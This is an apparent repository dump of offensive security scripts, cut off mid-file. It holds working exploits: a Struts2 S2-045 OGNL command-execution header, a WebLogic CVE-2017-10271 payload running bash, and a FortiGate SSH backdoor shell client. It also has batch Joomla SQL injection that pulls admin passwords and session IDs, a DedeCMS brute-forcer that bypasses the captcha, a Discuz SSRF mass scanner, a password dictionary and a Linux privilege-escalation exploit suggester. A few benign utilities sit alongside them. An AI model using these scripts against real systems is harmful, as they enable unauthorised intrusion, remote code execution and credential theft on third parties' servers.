├── 045.py ├── 0x04-openssh-5.5p1.patch.tar.gz ├── 0x06-openssh-5.9p1.patch.tar.gz ├── CVE-2017-10271.py ├── FortiGate_backdoor.py ├── Jira_get_user.py ├── Joomla.py ├── PHP_ImageMagick_exp.php ├── README.md ├── S2批量漏洞检测工具.py ├── XMLHttpRequest.html ├── ao.py ├── bool_sqli.py ├── cmd.py ├── compare.py ├── cookies.py ├── dede_brute.py ├── def.py ├── dic.txt ├── dz论坛SSRF漏洞批量捡漏脚本.py ├── excel_add.py ├── execjs.py ├── export_http.py ├── g_r.py ├── insert_show.php ├── it.py ├── js_http.py ├── linux提权辅助脚本.pl ├── mail.py ├── mailbrute.py ├── md5.py ├── mimikatz_trunk.zip ├── mp3.py ├── openssh_backdoor_readme ├── port_scan.py ├── quchong_1.py ├── quchong_2.py ├── redmine_get_user.py ├── same-ip-search.py ├── smtp_brute.py ├── struts2-046.py ├── struts2-Batch-scan.py ├── su.py ├── subdomain_brute.py ├── subdomain_brute_th.py ├── subdomainbrute.py ├── timesqli_.py ├── weakpwdfuzz.py ├── weblogic.py ├── wordpress批量爆破程序.py ├── xh.py ├── xingming500.txt ├── 任意文件下载.py └── 整理mail小程序.py /045.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | url = sys.argv[1] 4 | headers = {"Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"} 5 | get = requests.get(url,headers=headers) 6 | 7 | print get.content 8 | -------------------------------------------------------------------------------- /0x04-openssh-5.5p1.patch.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Jumbo-WJB/notes/32f890b60763f67b532c4db7e7cb8459c7e26721/0x04-openssh-5.5p1.patch.tar.gz -------------------------------------------------------------------------------- /0x06-openssh-5.9p1.patch.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Jumbo-WJB/notes/32f890b60763f67b532c4db7e7cb8459c7e26721/0x06-openssh-5.9p1.patch.tar.gz -------------------------------------------------------------------------------- /CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | 4 | url = sys.argv[1] + "/wls-wsat/CoordinatorPortType" 5 | 6 | print url 7 | 8 | headers = { 9 | "X-Forwarded-For": "10.244.31.175", 10 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", 11 | "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", 12 | "Content-Type": "text/xml" 13 | } 14 | 15 | data = ''' 16 | 17 | 18 | 19 | 20 | 21 | 22 | /bin/bash 23 | 24 | 25 | -c 26 | 27 | 28 | ping www.chinabaiker.com 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | ''' 37 | 38 | req = requests.post(url, data=data, headers=headers) 39 | 40 | print req.content, req.headers 41 | -------------------------------------------------------------------------------- /FortiGate_backdoor.py: -------------------------------------------------------------------------------- 1 | FortiGate OS(飞塔系统) 4.0-5.0.7 SSH 后门 2 | #!/usr/bin/env python 3 | 4 | # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 5 | # Usage: ./fgt_ssh_backdoor.py 6 | 7 | import socket 8 | import select 9 | import sys 10 | import paramiko 11 | from paramiko.py3compat import u 12 | import base64 13 | import hashlib 14 | import termios 15 | import tty 16 | 17 | def custom_handler(title, instructions, prompt_list): 18 | n = prompt_list[0][0] 19 | m = hashlib.sha1() 20 | m.update('\x00' * 12) 21 | m.update(n + 'FGTAbc11*xy+Qqz27') 22 | m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70') 23 | h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest()) 24 | return [h] 25 | 26 | 27 | def main(): 28 | if len(sys.argv) < 2: 29 | print 'Usage: ' + sys.argv[0] + ' ' 30 | exit(-1) 31 | 32 | client = paramiko.SSHClient() 33 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 34 | 35 | try: 36 | client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False) 37 | except paramiko.ssh_exception.SSHException: 38 | pass 39 | 40 | trans = client.get_transport() 41 | try: 42 | trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) 43 | except paramiko.ssh_exception.AuthenticationException: 44 | pass 45 | 46 | trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler) 47 | chan = client.invoke_shell() 48 | 49 | oldtty = termios.tcgetattr(sys.stdin) 50 | try: 51 | tty.setraw(sys.stdin.fileno()) 52 | tty.setcbreak(sys.stdin.fileno()) 53 | chan.settimeout(0.0) 54 | 55 | while True: 56 | r, w, e = select.select([chan, sys.stdin], [], []) 57 | if chan in r: 58 | try: 59 | x = u(chan.recv(1024)) 60 | if len(x) == 0: 61 | sys.stdout.write('\r\n*** EOF\r\n') 62 | break 63 | sys.stdout.write(x) 64 | sys.stdout.flush() 65 | except socket.timeout: 66 | pass 67 | if sys.stdin in r: 68 | x = sys.stdin.read(1) 69 | if len(x) == 0: 70 | break 71 | chan.send(x) 72 | 73 | finally: 74 | termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty) 75 | 76 | 77 | if __name__ == '__main__': 78 | main() 79 | -------------------------------------------------------------------------------- /Jira_get_user.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | users = [] 4 | url = "http://www.chinabaiker.com/secure/BrowseProjects.jspa?selectedCategory=all" 5 | body = requests.get(url).content 6 | regex = "name=(.*?)\"" 7 | keyword = re.findall(regex,body) 8 | for key in keyword: 9 | # print key 10 | users.append(key) 11 | 12 | user = set(users) 13 | # print user 14 | for u in user: 15 | print u 16 | -------------------------------------------------------------------------------- /Joomla.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests,re 4 | keu = r"Duplicate entry \'(.*?)\' for key \'group_key\' SQL=SELECT \(select 1 from \(select count\(\*\).concat\(\(select \(select concat\(username\)\)" 5 | uu = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 6 | url = open('urls.txt','r') 7 | for u in url: 8 | u = u.strip() 9 | print u + "*"*20 10 | ks = requests.get(str(u) + str(uu),timeout=15) 11 | if ks.status_code == 500: 12 | if ks.content.find('Duplicate entry')!=-1: 13 | a = re.findall(keu,ks.content) 14 | for b in a: 15 | print u + ' username is ' + b 16 | p = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 17 | ks = requests.get(str(u) + str(p),timeout=15) 18 | key = r"Duplicate entry \'(.*?)\' for key \'group_key\' SQL=SELECT \(select 1 from \(select count\(\*\).concat\(\(select \(select concat\(password\)\)" 19 | k = re.findall(key,ks.content) 20 | for s in k: 21 | print u + ' password is ' + s 22 | sess = "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(session_id)) from %23__session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" 23 | ks = requests.get(str(u) + str(sess),timeout=15) 24 | if ks.content.find('default'): 25 | print 'session_id no found' 26 | else: 27 | kes = r"Duplicate entry \'(.*?)\' for key \'group_key\' SQL=SELECT \(select 1 from \(select count\(\*\).concat\(\(select \(select concat\(session_id\)\)" 28 | n = re.findall(kes,ks.content) 29 | for m in n: 30 | print u + ' session_id is ' + m 31 | -------------------------------------------------------------------------------- /PHP_ImageMagick_exp.php: -------------------------------------------------------------------------------- 1 | " . SAE_TMP_PATH . "/data"; 18 | 19 | 20 | 21 | $exploit = <<readImage($path1); 46 | 47 | $thumb->writeImage($path2); 48 | 49 | $thumb->clear(); 50 | 51 | $thumb->destroy(); 52 | 53 | unlink("$path1"); 54 | 55 | unlink("$path2"); 56 | 57 | echo file_get_contents(SAE_TMP_PATH . "/data"); 58 | 59 | ?> 60 | 61 | 62 | //http://www.wooyun.org/bugs/wooyun-2016-0205051 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | notes 2 | -------------------------------------------------------------------------------- /S2批量漏洞检测工具.py: -------------------------------------------------------------------------------- 1 | def用的挺给力的,转载供以后学习。 2 | 3 | #!/usr/bin/env python 4 | # -*- coding: utf-8 -*- 5 | import requests 6 | import sys 7 | 8 | def s2exp(url,type): 9 | s2_016payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}" 10 | s2_019payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()" 11 | s2_032payload = "method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" # 12 | if type == "032": 13 | payload = s2_032payload 14 | elif type == "016": 15 | payload = s2_016payload 16 | else: 17 | payload = s2_019payload 18 | try: 19 | headers = {"Content-Type":"application/x-www-form-urlencoded"} 20 | r = requests.post(url,data=payload,headers=headers,timeout=5) 21 | res = r.text 22 | if res.find("88888887") <> -1: 23 | f = open("result.txt","a") 24 | f.write(l.strip() + " [s2-" + type + "]\r\n\r\n") 25 | print "\n[+]%s vulnerability exits s2-%s!" % (l.strip(),type), 26 | return true 27 | else: 28 | print "\n[-]%s Not s2-%s vulnerability" % (url,type), 29 | return False 30 | except: 31 | print "\n[-]%s timeout" % url, 32 | return False 33 | 34 | if __name__ == "__main__": 35 | if len(sys.argv) < 2: 36 | print "Example: python exp.py list.txt" 37 | exit() 38 | weblist = sys.argv[1] 39 | f = open(weblist) 40 | for l in f.readlines(): 41 | url = l.strip() 42 | s2exp(url,"032") 43 | s2exp(url,"016") 44 | s2exp(url,"019") 45 | 46 | -------------------------------------------------------------------------------- /XMLHttpRequest.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /ao.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | from aiohttp import ClientSession 3 | 4 | queue = asyncio.Queue() 5 | 6 | tasks = [] 7 | 8 | 9 | url = "http://www.baidu.com/{}" 10 | async def hello(url,semaphore): 11 | async with semaphore: 12 | async with ClientSession() as session: 13 | async with session.get(url,allow_redirects=False,timeout=10) as response: 14 | code = response.status 15 | # if code == 200: 16 | # print("200 : " + url) 17 | 18 | def run(): 19 | semaphore = asyncio.Semaphore(500) 20 | with open('dic.txt') as f: 21 | for dic in f: 22 | dic = dic.strip() 23 | task = asyncio.ensure_future(hello(url.format(dic),semaphore)) 24 | tasks.append(task) 25 | 26 | 27 | if __name__ == '__main__': 28 | loop = asyncio.get_event_loop() 29 | run() 30 | loop.run_until_complete(asyncio.wait(tasks)) 31 | loop.close() 32 | -------------------------------------------------------------------------------- /bool_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | def GetQ(): 5 | pd = '' 6 | payload = '0123456789abcdefghijklmnopqrstuvwxyz!_@%' 7 | for i in range(30): 8 | for p in payload: 9 | url = "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20and%20user()%20regexp%20%27^{}%27 and 'j'like'j&Submit=Submit#".format(pd+p) 10 | headers = {"Cookie":"security=low; PHPSESSID=65cba547699cda5ab206c6693735c8c6"} 11 | get = requests.get(url,headers=headers) 12 | if 'Surname' in get.content: 13 | # print p 14 | pd+=p 15 | print pd 16 | 17 | 18 | 19 | 20 | 21 | GetQ() 22 | -------------------------------------------------------------------------------- /cmd.py: -------------------------------------------------------------------------------- 1 | import os 2 | while True: 3 | 4 | cmd = raw_input('command> ') 5 | os.system(cmd) 6 | -------------------------------------------------------------------------------- /compare.py: -------------------------------------------------------------------------------- 1 | count=1 2 | list_1 = [] 3 | list_2 = [] 4 | with open('cj.txt','r') as f: 5 | list_1 = f.readlines() 6 | with open('da.txt','r') as f: 7 | list_2 = f.readlines() 8 | for i in range(len(list_1)): 9 | if list_1[i] != list_2[i]: 10 | print count 11 | count+=1 12 | 13 | 14 | 15 | //file.readlines()直接得到的就是一个列表,无需append 16 | -------------------------------------------------------------------------------- /cookies.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import sys 4 | reload(sys) 5 | sys.setdefaultencoding('utf8') //设置编码好把内容写入文件中 6 | csv = open('lianxiren.txt','w') 7 | for i in range(23): //循环次数 8 | print i 9 | url = "http://10.2.1.2:8080/manager/securityPolicy.do?method=detailed&userid=%s" %i //i是循环值 10 | key = r"(.*?)<\/td>" 11 | cookies = {'JSESSIONID':'abcmnXlTUM9Z98bfQ_skv','testBanCookie':'test'} //多个cookie值用逗号隔开 12 | get = requests.get(url,cookies = cookies) 13 | print get.text 14 | body = re.findall(key,get.text) 15 | for b in body: 16 | print b 17 | csv.write(b + '\n') //末尾回车防止杂乱 18 | -------------------------------------------------------------------------------- /dede_brute.py: -------------------------------------------------------------------------------- 1 | //http://www.wooyun.org/bug.php?action=view&id=75051 2 | # -*- coding:utf-8 -*- 3 | import requests 4 | import re 5 | pass_dict = open('passwords.txt','r') 6 | 7 | def GetSession(): 8 | global r 9 | r = requests.session() 10 | url = "http://www.chinabaiekr.com/include/vdimgck.php" 11 | get = r.get(url) 12 | PHPSESSID = get.cookies['PHPSESSID'] 13 | session_url = "http://www.chinabaiekr.com/" + 'data/sessions/sess_' + PHPSESSID 14 | session_get = requests.get(session_url) 15 | session_get = session_get.content 16 | regex = "securimage\_code\_value\|s\:4\:\"(.*?)\"\;" 17 | key = re.findall(regex,session_get) 18 | global k 19 | for k in key: 20 | print k 21 | 22 | 23 | 24 | def Reqpost(): 25 | headers = {"Content-type":"application/x-www-form-urlencoded"} 26 | payload = "dopost=login&adminstyle=newdedecms&userid=admin&pwd=%s&validate=%s" %(password,k) 27 | print payload 28 | post_url = "http://www.chinabaiekr.com/dede/login.php" 29 | content = r.post(post_url,data=payload,headers=headers,allow_redirects=False) 30 | print content.content 31 | if (r'密码错误' or '404 Not Found' in content.content) == False: 32 | return False 33 | 34 | 35 | 36 | for password in pass_dict: 37 | GetSession() 38 | if False == Reqpost(): 39 | break 40 | -------------------------------------------------------------------------------- /def.py: -------------------------------------------------------------------------------- 1 | a = raw_input('111:' ) 2 | def test(test): 3 | print 1 4 | def ceshi(ceshi): 5 | print 2 6 | if int(a) == 1: 7 | test(test) 8 | else: 9 | ceshi(ceshi) 10 | -------------------------------------------------------------------------------- /dic.txt: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%1 3 | %username%12 4 | %username%123 5 | %username%12345 6 | %username%123456 7 | %username%1234567 8 | %username%12345678 9 | %username%123456789 10 | %username%520 11 | %username%521 12 | %username%5201314 13 | %username%2012 14 | %username%2013 15 | %username%2014 16 | %username%2015 17 | %username%2016 18 | %username%_2012 19 | %username%_2013 20 | %username%_2014 21 | %username%_2015 22 | %username%_2016 23 | %username%321 24 | %username%@123 25 | %username%123!@# 26 | %username%!@#123 27 | %username%666 28 | %username%888 29 | %username%@1 30 | %username%.. 31 | %username%@123.com 32 | %username%@163 33 | %username%@163.com 34 | %username%8 35 | %username%88 36 | %username%888 37 | %username%999 38 | %username%666 39 | %username%!@# 40 | %username%1qa 41 | %username%2ws 42 | %username%3ed 43 | %username%test 44 | %username%#test# 45 | testtest 46 | testtest. 47 | testtest.. 48 | testtest... 49 | 123456 50 | a123456 51 | 654321a 52 | a654321 53 | 123qwe 54 | qwe123 55 | -------------------------------------------------------------------------------- /dz论坛SSRF漏洞批量捡漏脚本.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # encoding: utf-8 4 | #http://wooyun.org/bugs/wooyun-2016-0218421 5 | 6 | 7 | import urlparse 8 | 9 | import random 10 | 11 | import time 12 | 13 | import re 14 | 15 | 16 | 17 | import requests 18 | 19 | from utils.fileutils import FileUtils 20 | 21 | 22 | 23 | import requests.packages.urllib3 24 | 25 | requests.packages.urllib3.disable_warnings() 26 | 27 | 28 | 29 | for website in FileUtils.getLines('qqdz.lst'): 30 | 31 | request = requests.session() 32 | 33 | try: 34 | 35 | forumurl = "{website}/forum.php".format(website=website) 36 | 37 | response = request.get(forumurl, timeout=5, verify=False) 38 | 39 | formhash = re.findall(r'formhash" value="(.*?)"',response.content) 40 | 41 | netloc = urlparse.urlparse(website).netloc 42 | 43 | payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc) 44 | 45 | url = "{website}/forum.php?mod=ajax&action=downremoteimg&formhash={formhash}&message=[img]{payload}[/img]".format( 46 | 47 | website=website, 48 | 49 | formhash=formhash[0] if formhash else '', 50 | 51 | payload=payload) 52 | 53 | response = request.get(url, timeout=5, verify=False) 54 | 55 | print url, len(response.content) 56 | 57 | except Exception, e: 58 | 59 | print website, e 60 | -------------------------------------------------------------------------------- /excel_add.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | #author:Jumbo 3 | 4 | 5 | from os import path,listdir 6 | from openpyxl import load_workbook,Workbook 7 | 8 | def Excel_Add(): 9 | print(path.abspath('.')) # 打印当前目录 10 | xlfs = [x for x in listdir('.') if path.isfile(x) 11 | and path.splitext(x)[1] == '.xlsx'] # 罗列目录内所有xlsx文件 12 | print('需要统计',len(xlfs) , '个表格') 13 | print (xlfs) 14 | print(xlfs[0]) 15 | 16 | xl0 = xlfs[0] 17 | data0 = []#复制表头数据 18 | wb0 = load_workbook(filename = xl0) 19 | ws0 = wb0.active 20 | for i in range(1,ws0.max_column+1): 21 | data0.append(ws0.cell(row = 1,column = i).value) 22 | # print('表头',data0) 23 | 24 | data1 = []#复制数据 25 | num = len(xlfs) 26 | for n in range(num): 27 | xf = xlfs[n] 28 | wb1 = load_workbook(filename = xf) 29 | ws1 = wb1.active 30 | for i in range(2,ws1.max_row + 1): 31 | list = [] 32 | for j in range(1,ws1.max_column + 1): 33 | list.append(ws1.cell(row=i,column=j).value) 34 | data1.append(list) 35 | 36 | # # 汇总表头和数据,新建保存总表 37 | data=[] 38 | data.append(data0)#添加表头 39 | for l in range(len(data1)):#添加数据 40 | data.append(data1[l]) 41 | wb = Workbook()#新建表 42 | ws = wb.active 43 | ws.title = '汇总' 44 | for n_row in range(1,len(data)+1):#写入数据 45 | for n_col in range(1,len(data[n_row-1])+1): 46 | ws.cell(row=n_row,column=n_col,value=str(data[n_row-1][n_col-1])) 47 | wb.save(filename='总表.xlsx')#保存xlsx 48 | print ('汇总完成') 49 | 50 | 51 | def Load_sheet(i): 52 | weixie_result = ws.cell(i,4).value 53 | ok_result = f'发现存在{weixie_result},需' 54 | ws.cell(i,5).value = ok_result 55 | wb.save('new.xlsx') 56 | 57 | 58 | def main(row): 59 | for i in range(2,row): 60 | Load_sheet(i) 61 | 62 | if __name__ == '__main__': 63 | Excel_Add() 64 | wb = load_workbook(filename = '2.xlsx') 65 | ws = wb.worksheets[0] 66 | row = ws.max_row + 1 67 | main(row) 68 | print('整理完成') 69 | -------------------------------------------------------------------------------- /execjs.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import execjs 5 | 6 | def Encode(str): 7 | with open ('md5.js','r') as js: 8 | source = js.read() 9 | getpass = execjs.compile(source) 10 | password = getpass.call('hex_md5',str) 11 | print password 12 | 13 | if __name__ == '__main__': 14 | with open ('pass.dict') as passwd: 15 | for ps in passwd: 16 | Encode(ps) 17 | -------------------------------------------------------------------------------- /export_http.py: -------------------------------------------------------------------------------- 1 | from libnmap.parser import NmapParser 2 | nmap_report = NmapParser.parse_fromfile('nmap.xml') 3 | urls = [ (b.service + b.tunnel).replace('sl','') + '://' + a.address + ':' + str(b.port) + '/' for a in nmap_report.hosts for b in a.services if b.open() and b.service.startswith('http') ] 4 | for x in urls: 5 | print x 6 | -------------------------------------------------------------------------------- /g_r.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | #author:Jumbo 4 | #website:www.chinabaiker.com 5 | import grequests 6 | import requests 7 | import os 8 | ls = os.linesep 9 | 10 | 11 | 12 | def dir_scanner(dicts): 13 | body = [grequests.get('http://music.163.com' + dict) for dict in dicts] 14 | resps = grequests.map(body,size=10) 15 | # print resps 16 | for resp in resps: 17 | if resp.status_code == 200 and ('404' in resp.content) == False: 18 | print resp.url 19 | result_list.append(resp.url + ls) 20 | 21 | # def Get_sfx(): 22 | # suffix = ['.orig', '~', '.~', '.original', '.swo', '.swp', '.txt', '.new', '.7z', '.tar.xz', '.tar.gz', '.rar', '.save', '.zip', '.bak', '.old'] 23 | # for sfx in suffix: 24 | # sfx_body = [grequests.get(sfx_url.strip() + sfx) for sfx_url in result_list] 25 | # sfx_resps = grequests.map(sfx_body,size=10) 26 | # # print sfx_resps 27 | # for sfx_resp in sfx_resps: 28 | # if sfx_resp.status_code == 200 and ('404' in sfx_resp.content) == False: 29 | # result_list.append(sfx_resp.url + ls) 30 | 31 | 32 | 33 | 34 | def Get_sfx(): 35 | suffix = ['.orig', '~', '.~', '.original', '.swo', '.swp', '.txt', '.new', '.7z', '.tar.xz', '.tar.gz', '.rar', '.save', '.zip', '.bak', '.old'] 36 | for sfx_urls in result_list: 37 | for sfx in suffix: 38 | sfx_url = sfx_urls.strip() + sfx 39 | # print sfx_url 40 | sfx_body = requests.get(sfx_url) 41 | if sfx_body.status_code == 200 and ('404' in sfx_body.content) == False: 42 | print sfx_body.url 43 | # result_list.append(sfx_body.url + ls) 44 | 45 | 46 | def save_file(): 47 | with open('saveok.txt', 'w') as f: 48 | f.writelines(set(result_list)) 49 | f.close() 50 | 51 | 52 | if __name__ == "__main__": 53 | ok_list = [] 54 | result_list = [] 55 | dicts = [] 56 | for dict in open('php.txt','r'): 57 | dict = dict.strip() 58 | dicts.append(dict) 59 | dir_scanner(dicts) 60 | Get_sfx() 61 | save_file() 62 | 63 | print '----end-----' 64 | -------------------------------------------------------------------------------- /insert_show.php: -------------------------------------------------------------------------------- 1 | set_charset("utf8mb4"); 10 | ?> 11 | 12 | 13 | 漏洞查询 14 | 15 | 16 | 17 | 18 |

漏洞录入

19 |
20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 43 |
师傅名字:    
项目名称:    
高危数量:    
中危数量:    
低危数量:    
41 | 42 |
44 |
45 | 46 | 47 | 56 | 57 | 58 |

漏洞查询

59 |
60 | 根据姓名查询 61 |
62 |
63 | 78 | 79 |
80 |
81 | 根据项目查询 82 |
83 |
84 | 98 | 99 |
100 |
101 | 102 | 漏洞提交信息"; 108 | echo "
"; 109 | echo ""; 110 | echo ""; 111 | echo ""; 112 | echo ""; 113 | while($row3 = $result3->fetch_assoc()) { 114 | echo ""; 115 | echo ""; 116 | echo ""; 117 | } 118 | echo "
姓名项目名称高危数量中危数量低危数量
{$row3['username']}{$row3['project']}{$row3['high']}{$row3['medium']}{$row3['low']}
"; 119 | ?> 120 | 121 | 122 | -------------------------------------------------------------------------------- /it.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | import itchat 4 | from itchat.content import * 5 | 6 | @itchat.msg_register([TEXT], isGroupChat=True) 7 | def xyz_reply(msg): 8 | group_list = [u'徐汇七大霸王'] 9 | group_name = [] 10 | for group in group_list: 11 | chat = itchat.search_chatrooms(name=group) 12 | # print chat[0]['UserName'] 13 | # print chat 14 | if len(chat) > 0: 15 | group_name.append(chat[0]['UserName']) 16 | # print chat[0]['UserName'] 17 | # text = msg['Content'] 18 | 19 | print msg['User']['NickName'] 20 | if msg['User']['NickName'] == u'徐汇七大霸王': 21 | text = msg['Content'] 22 | itchat.send('%s'%(text), toUserName=chat[0]['UserName']) 23 | 24 | 25 | 26 | 27 | 28 | if __name__ == '__main__': 29 | itchat.auto_login(hotReload=True) 30 | itchat.run() 31 | -------------------------------------------------------------------------------- /js_http.py: -------------------------------------------------------------------------------- 1 | #http://tools.sharejs.com/beautify-javascript.html 2 | import re 3 | a = open('1.txt','r') 4 | for b in a: 5 | # print b 6 | regex = "\"(\/\w{1,}\/\w{1,}.*)\"" 7 | key = re.findall(regex,b) 8 | if len(key) > 0: 9 | print key 10 | -------------------------------------------------------------------------------- /linux提权辅助脚本.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # update:2016.08.15 3 | use strict; 4 | use warnings; 5 | use Getopt::Std; 6 | 7 | our $VERSION = '1.0'; 8 | 9 | my %opts; 10 | getopt( 'k,h', \%opts ); 11 | usage() if exists $opts{h}; 12 | 13 | my ( $khost, $is_partial ) = get_kernel(); 14 | print "\nKernel local: $khost\n\n"; 15 | 16 | my %exploits = get_exploits(); 17 | print 'Searching among ' . scalar keys(%exploits) . " exploits...\n\n"; 18 | print "Possible Exploits:\n"; 19 | 20 | EXPLOIT: 21 | foreach my $key ( sort keys %exploits ) { 22 | foreach my $kernel ( @{ $exploits{$key}{vuln} } ) { 23 | 24 | if ( $khost eq $kernel 25 | or ( $is_partial and index($kernel,$khost) == 0 ) 26 | ) { 27 | print "[+] $key"; 28 | print " ($kernel)" if $is_partial; 29 | 30 | my $alt = $exploits{$key}{alt}; 31 | my $cve = $exploits{$key}{cve}; 32 | my $mlw = $exploits{$key}{mil}; 33 | if ( $alt or $cve ) { 34 | print "\n"; 35 | } 36 | if ( $alt ) { print " Alt: $alt "; } 37 | if ( $cve ) { print " CVE-$cve"; } 38 | if ( $mlw ) { print "\n Source: $mlw"; } 39 | print "\n"; 40 | next EXPLOIT; 41 | } 42 | } 43 | } 44 | exit; 45 | 46 | 47 | ###################### 48 | ## extra functions ## 49 | ###################### 50 | 51 | sub get_kernel { 52 | my $khost = ''; 53 | 54 | if ( exists $opts{k} ) { 55 | $khost = $opts{k}; 56 | } 57 | else { 58 | $khost = `uname -r |cut -d"-" -f1`; 59 | chomp $khost; 60 | } 61 | 62 | # partial kernels might be provided by the user, 63 | # such as '2.4' or '2.6.' 64 | my $is_partial = $khost =~ /^\d+\.\d+\.?\d?/ ? 0 : 1; 65 | if ( $is_partial and substr($khost,-1) ne '.' ) { 66 | $khost .= '.'; 67 | } 68 | return ( $khost, $is_partial ); 69 | } 70 | 71 | sub usage { 72 | print <<"EOUSAGE"; 73 | Linux Exploit Suggester $VERSION 74 | Usage: \t$0 [-h] [-k kernel] 75 | 76 | [-h] help (this message) 77 | [-k] kernel number eg. 2.6.28 78 | 79 | You can also provide a partial kernel version (eg. 2.4) 80 | to see all exploits available. 81 | 82 | EOUSAGE 83 | } 84 | 85 | sub get_exploits { 86 | return ( 87 | 'w00t' => { 88 | vuln => [ 89 | '2.4.10', '2.4.16', '2.4.17', '2.4.18', 90 | '2.4.19', '2.4.20', '2.4.21', 91 | ] 92 | }, 93 | 'brk' => { 94 | vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], 95 | }, 96 | 'ave' => { vuln => [ '2.4.19', '2.4.20' ] }, 97 | 98 | 'elflbl' => { 99 | vuln => ['2.4.29'], 100 | mil => 'http://www.exploit-db.com/exploits/744/', 101 | }, 102 | 103 | 'elfdump' => { vuln => ['2.4.27'] }, 104 | 'elfcd' => { vuln => ['2.6.12'] }, 105 | 'expand_stack' => { vuln => ['2.4.29'] }, 106 | 107 | 'h00lyshit' => { 108 | vuln => [ 